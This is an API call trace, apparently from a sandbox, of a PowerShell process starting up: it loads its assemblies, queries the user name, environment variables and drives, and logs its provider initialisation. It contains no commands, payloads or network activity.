	[0321.427] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b7434c0, nSize=0x1cd348 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1cd348) returned 0x1
	[0321.427] CoTaskMemFree (pv=0x1b7434c0) 
	[0321.427] CoTaskMemAlloc (cb=0x204) returned 0x2a92a0
	[0321.427] GetUserNameW (in: lpBuffer=0x2a92a0, pcbBuffer=0x1cd388 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1cd388) returned 1
	[0321.427] CoTaskMemFree (pv=0x2a92a0) 
	[0321.428] ReportEventW (hEventLog=0x1b960008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2d5f380*="Alias", lpRawData=0x2d5f110) returned 1
	[0321.433] CoTaskMemAlloc (cb=0x104) returned 0x2a1100
	[0321.433] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a1100, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0321.433] CoTaskMemFree (pv=0x2a1100) 
	[0321.434] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.434] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.435] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.435] CoTaskMemAlloc (cb=0x804) returned 0x1b7434c0
	[0321.435] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b7434c0, nSize=0x1cd348 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1cd348) returned 0x1
	[0321.435] CoTaskMemFree (pv=0x1b7434c0) 
	[0321.435] CoTaskMemAlloc (cb=0x204) returned 0x2a92a0
	[0321.436] GetUserNameW (in: lpBuffer=0x2a92a0, pcbBuffer=0x1cd388 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1cd388) returned 1
	[0321.436] CoTaskMemFree (pv=0x2a92a0) 
	[0321.436] ReportEventW (hEventLog=0x1b960008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2d64978*="Environment", lpRawData=0x2d64708) returned 1
	[0321.449] CoTaskMemAlloc (cb=0x104) returned 0x2a1100
	[0321.449] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a1100, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0321.449] CoTaskMemFree (pv=0x2a1100) 
	[0321.450] CoTaskMemAlloc (cb=0x104) returned 0x2a1100
	[0321.450] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x2a1100, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0321.450] CoTaskMemFree (pv=0x2a1100) 
	[0321.450] CoTaskMemAlloc (cb=0x104) returned 0x2a1100
	[0321.450] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x2a1100, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0321.450] CoTaskMemFree (pv=0x2a1100) 
	[0321.450] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x1ccef0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d
	[0321.451] SetErrorMode (uMode=0x1) returned 0x1
	[0321.451] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0x1cd100 | out: lpFileInformation=0x1cd100*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0321.451] SetErrorMode (uMode=0x1) returned 0x1
	[0321.451] GetLogicalDrives () returned 0x4
	[0321.452] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x1ccc60, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0321.452] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0321.453] SetErrorMode (uMode=0x1) returned 0x1
	[0321.453] CoTaskMemAlloc (cb=0x68) returned 0x31b940
	[0321.453] CoTaskMemAlloc (cb=0x68) returned 0x31bd30
	[0321.453] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x31b940, nVolumeNameSize=0x32, lpVolumeSerialNumber=0x1cd0d0, lpMaximumComponentLength=0x1cd0cc, lpFileSystemFlags=0x1cd0c8, lpFileSystemNameBuffer=0x31bd30, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x1cd0d0*=0x9c354b42, lpMaximumComponentLength=0x1cd0cc*=0xff, lpFileSystemFlags=0x1cd0c8*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1
	[0321.453] CoTaskMemFree (pv=0x31b940) 
	[0321.454] CoTaskMemFree (pv=0x31bd30) 
	[0321.454] SetErrorMode (uMode=0x1) returned 0x1
	[0321.454] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0321.454] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1cce10, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0321.454] SetErrorMode (uMode=0x1) returned 0x1
	[0321.454] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x1cd070 | out: lpFileInformation=0x1cd070*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0321.455] SetErrorMode (uMode=0x1) returned 0x1
	[0321.455] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1cce10, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0321.455] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x1cccc0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0321.455] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0321.455] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x1ccbf0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0321.455] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0321.456] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1ccc40, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0321.456] SetErrorMode (uMode=0x1) returned 0x1
	[0321.456] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x1ccea0 | out: lpFileInformation=0x1ccea0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0321.456] SetErrorMode (uMode=0x1) returned 0x1
	[0321.456] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1ccc40, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0321.456] SetErrorMode (uMode=0x1) returned 0x1
	[0321.456] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x1ccea0 | out: lpFileInformation=0x1ccea0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0321.456] SetErrorMode (uMode=0x1) returned 0x1
	[0321.457] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1ccce0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0321.457] SetErrorMode (uMode=0x1) returned 0x1
	[0321.457] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x1ccf40 | out: lpFileInformation=0x1ccf40*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0321.457] SetErrorMode (uMode=0x1) returned 0x1
	[0321.457] CoTaskMemAlloc (cb=0x804) returned 0x1b7434c0
	[0321.457] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b7434c0, nSize=0x1cd348 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1cd348) returned 0x1
	[0321.457] CoTaskMemFree (pv=0x1b7434c0) 
	[0321.457] CoTaskMemAlloc (cb=0x204) returned 0x2a92a0
	[0321.457] GetUserNameW (in: lpBuffer=0x2a92a0, pcbBuffer=0x1cd388 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1cd388) returned 1
	[0321.458] CoTaskMemFree (pv=0x2a92a0) 
	[0321.458] ReportEventW (hEventLog=0x1b960008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2d6ba68*="FileSystem", lpRawData=0x2d6b7f8) returned 1
	[0321.462] CoTaskMemAlloc (cb=0x104) returned 0x2a1100
	[0321.462] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a1100, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0321.462] CoTaskMemFree (pv=0x2a1100) 
	[0321.462] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccc20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.462] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccb70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.462] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccb70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.463] CoTaskMemAlloc (cb=0x804) returned 0x1b7434c0
	[0321.463] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b7434c0, nSize=0x1cd348 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1cd348) returned 0x1
	[0321.463] CoTaskMemFree (pv=0x1b7434c0) 
	[0321.463] CoTaskMemAlloc (cb=0x204) returned 0x2a92a0
	[0321.463] GetUserNameW (in: lpBuffer=0x2a92a0, pcbBuffer=0x1cd388 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1cd388) returned 1
	[0321.463] CoTaskMemFree (pv=0x2a92a0) 
	[0321.464] ReportEventW (hEventLog=0x1b960008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2d712a8*="Function", lpRawData=0x2d71038) returned 1
	[0321.473] CoTaskMemAlloc (cb=0x104) returned 0x2a1100
	[0321.473] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a1100, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0321.473] CoTaskMemFree (pv=0x2a1100) 
	[0321.475] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.475] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.476] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.476] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0322.000] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0322.001] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0322.001] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0322.003] CoTaskMemAlloc (cb=0x804) returned 0x1b7434c0
	[0322.003] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b7434c0, nSize=0x1cd348 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1cd348) returned 0x1
	[0322.412] CoTaskMemFree (pv=0x1b7434c0) 
	[0322.412] CoTaskMemAlloc (cb=0x204) returned 0x2a92a0
	[0322.412] GetUserNameW (in: lpBuffer=0x2a92a0, pcbBuffer=0x1cd388 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1cd388) returned 1
	[0322.412] CoTaskMemFree (pv=0x2a92a0) 
	[0322.413] ReportEventW (hEventLog=0x1b960008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2da3680*="Registry", lpRawData=0x2da3410) returned 1
	[0322.743] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0322.744] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0322.744] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0322.744] CoTaskMemAlloc (cb=0x804) returned 0x1b7434c0
	[0322.744] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b7434c0, nSize=0x1cd348 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1cd348) returned 0x1
	[0322.745] CoTaskMemFree (pv=0x1b7434c0) 
	[0322.745] CoTaskMemAlloc (cb=0x204) returned 0x2a92a0
	[0322.745] GetUserNameW (in: lpBuffer=0x2a92a0, pcbBuffer=0x1cd388 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1cd388) returned 1
	[0322.745] CoTaskMemFree (pv=0x2a92a0) 
	[0322.746] ReportEventW (hEventLog=0x1b960008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2da8a98*="Variable", lpRawData=0x2da8828) returned 1
	[0322.786] CoTaskMemAlloc (cb=0x104) returned 0x2a1100
	[0322.786] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a1100, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0322.787] CoTaskMemFree (pv=0x2a1100) 
	[0322.789] CoTaskMemAlloc (cb=0x104) returned 0x2a1100
	[0322.789] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a1100, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0322.790] CoTaskMemFree (pv=0x2a1100) 
	[0322.792] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1ccbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0322.792] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1ccb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0322.792] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1ccb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0322.792] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1ccb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0323.225] CoTaskMemAlloc (cb=0x804) returned 0x1b74cf30
	[0323.225] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b74cf30, nSize=0x1cd348 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1cd348) returned 0x1
	[0323.225] CoTaskMemFree (pv=0x1b74cf30) 
	[0323.225] CoTaskMemAlloc (cb=0x204) returned 0x2a92a0
	[0323.226] GetUserNameW (in: lpBuffer=0x2a92a0, pcbBuffer=0x1cd388 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1cd388) returned 1
	[0323.226] CoTaskMemFree (pv=0x2a92a0) 
	[0323.226] ReportEventW (hEventLog=0x1b960008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2dbc6b0*="Certificate", lpRawData=0x2dbc440) returned 1
	[0323.554] CoTaskMemAlloc (cb=0x104) returned 0x2a1100
	[0323.554] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a1100, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0323.554] CoTaskMemFree (pv=0x2a1100) 
	[0323.557] GetLogicalDrives () returned 0x4
	[0323.558] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x1ccfd0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0323.558] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0323.559] CoTaskMemAlloc (cb=0x20e) returned 0x2ef2b0
	[0323.559] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x2ef2b0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0323.559] CoTaskMemFree (pv=0x2ef2b0) 
	[0323.561] CoTaskMemAlloc (cb=0x104) returned 0x2a1100
	[0323.561] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a1100, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0323.562] CoTaskMemFree (pv=0x2a1100) 
	[0323.562] CoTaskMemAlloc (cb=0x104) returned 0x2a1100
	[0323.562] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a1100, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0323.562] CoTaskMemFree (pv=0x2a1100) 
	[0323.575] CoTaskMemAlloc (cb=0x104) returned 0x2a1100
	[0323.576] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a1100, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0323.576] CoTaskMemFree (pv=0x2a1100) 
	[0323.578] CoTaskMemAlloc (cb=0x104) returned 0x2a1100
	[0323.578] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a1100, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0323.578] CoTaskMemFree (pv=0x2a1100) 
	[0323.578] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1ccd30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0323.578] SetErrorMode (uMode=0x1) returned 0x1
	[0323.578] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1ccf90 | out: lpFileInformation=0x1ccf90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0323.578] SetErrorMode (uMode=0x1) returned 0x1
	[0323.579] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1ccd30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0323.579] SetErrorMode (uMode=0x1) returned 0x1
	[0323.579] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1ccf90 | out: lpFileInformation=0x1ccf90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0323.579] SetErrorMode (uMode=0x1) returned 0x1
	[0323.579] CoTaskMemAlloc (cb=0x104) returned 0x2a1100
	[0323.579] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a1100, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0323.579] CoTaskMemFree (pv=0x2a1100) 
	[0323.584] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1cced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0323.584] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1ccd40, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0323.585] SetErrorMode (uMode=0x1) returned 0x1
